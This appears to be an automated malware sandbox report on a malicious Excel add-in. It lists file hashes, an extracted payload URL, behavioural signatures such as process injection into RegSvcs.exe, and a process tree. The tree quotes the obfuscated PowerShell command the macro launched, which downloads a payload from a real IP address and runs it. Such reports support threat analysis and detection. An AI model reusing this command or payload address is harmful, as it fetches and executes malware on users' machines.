Analysis
- max time kernel: 149s
- max time network: 144s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 20-04-2021 20:10
Static task: static1
Behavioral task: behavioral1
- Sample: Swift_Processing and monitoring.xlam
- Resource: win7v20210408
General
- Target: Swift_Processing and monitoring.xlam
- Size: 19KB
- MD5: e776a82944a04d1939e9ce9916c30771
- SHA1: 080948c7533b52301fdaa5d3be8b04d58d24aa12
- SHA256: aac964b49d6f12b420121a28b5c856e473695e00cb5095b862ea9c0db67ed119
- SHA512: 7c9eebbc93f362ec5173ca1a06c38a920c1cff240974bab882c451fbd08d9c6799dd7c0004f8463f6b4b133bb1beedcd1227fa91feead363272f555cc9852891
Malware Config
- Extracted: http://179.43.140.150/shtq/fack.jpg
Signatures
- Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powershell.exe, WerFault.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3008 | 4000 | powershell.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3760 | 4000 | WerFault.exe | EXCEL.EXE
- Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
  Processes: WerFault.exe
  description | pid | process | target process
  PID 3760 created 4000 | 3760 | WerFault.exe | EXCEL.EXE
- Blocklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid | process
  32 | 3008 | powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
  description | pid | process | target process
  PID 3008 set thread context of 2648 | 3008 | powershell.exe | RegSvcs.exe
- Program crash (1 IoC)
  Processes: WerFault.exe
  pid | pid_target | process | target process
  3760 | 4000 | WerFault.exe | EXCEL.EXE
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: EXCEL.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: EXCEL.EXE
  pid | process
  4000 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (33 IoCs)
  Processes: powershell.exe, RegSvcs.exe, WerFault.exe
  pid | process | entries
  3008 | powershell.exe | 3
  2648 | RegSvcs.exe | 6
  3760 | WerFault.exe | 15
  2648 | RegSvcs.exe | 9
  (33 entries in total, grouped in the order reported)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes: RegSvcs.exe
  pid | process
  2648 | RegSvcs.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: powershell.exe, RegSvcs.exe, WerFault.exe
  description | pid | process
  Token: SeDebugPrivilege | 3008 | powershell.exe
  Token: SeDebugPrivilege | 2648 | RegSvcs.exe
  Token: SeDebugPrivilege | 3760 | WerFault.exe
- Suspicious use of SetWindowsHookEx (8 IoCs)
  Processes: EXCEL.EXE
  pid | process | entries
  4000 | EXCEL.EXE | 8
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes: EXCEL.EXE, powershell.exe
  description | pid | process | target process | entries
  PID 4000 wrote to memory of 3008 | 4000 | EXCEL.EXE | powershell.exe | 2
  PID 3008 wrote to memory of 2648 | 3008 | powershell.exe | RegSvcs.exe | 8
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift_Processing and monitoring.xlam"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://179.43.140.150/shtq/fack.jpg')"
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (level 3)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\WerFault.exe (level 2)
    Command line: C:\Windows\system32\WerFault.exe -u -p 4000 -s 4048
    - Process spawned unexpected child process
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/2648-187-0x0000000005170000-0x000000000566E000-memory.dmp (5.0MB)
- memory/2648-186-0x0000000005170000-0x000000000566E000-memory.dmp (5.0MB)
- memory/2648-184-0x000000000041E792-mapping.dmp
- memory/3008-180-0x0000000000000000-mapping.dmp
- memory/3008-185-0x000001F3BF6B0000-0x000001F3BF6B1000-memory.dmp (4KB)
- memory/3008-183-0x000001F3BD806000-0x000001F3BD808000-memory.dmp (8KB)
- memory/3008-181-0x000001F3BD800000-0x000001F3BD802000-memory.dmp (8KB)
- memory/3008-182-0x000001F3BD803000-0x000001F3BD805000-memory.dmp (8KB)
- memory/4000-118-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp (64KB)
- memory/4000-179-0x0000029C5E480000-0x0000029C5E484000-memory.dmp (16KB)
- memory/4000-123-0x0000029C4AAD0000-0x0000029C4C9C5000-memory.dmp (31.0MB)
- memory/4000-122-0x00007FFAA9DE0000-0x00007FFAAAECE000-memory.dmp (16.9MB)
- memory/4000-119-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp (64KB)
- memory/4000-114-0x00007FF678D60000-0x00007FF67C316000-memory.dmp (53.7MB)
- memory/4000-117-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp (64KB)
- memory/4000-116-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp (64KB)
- memory/4000-115-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp (64KB)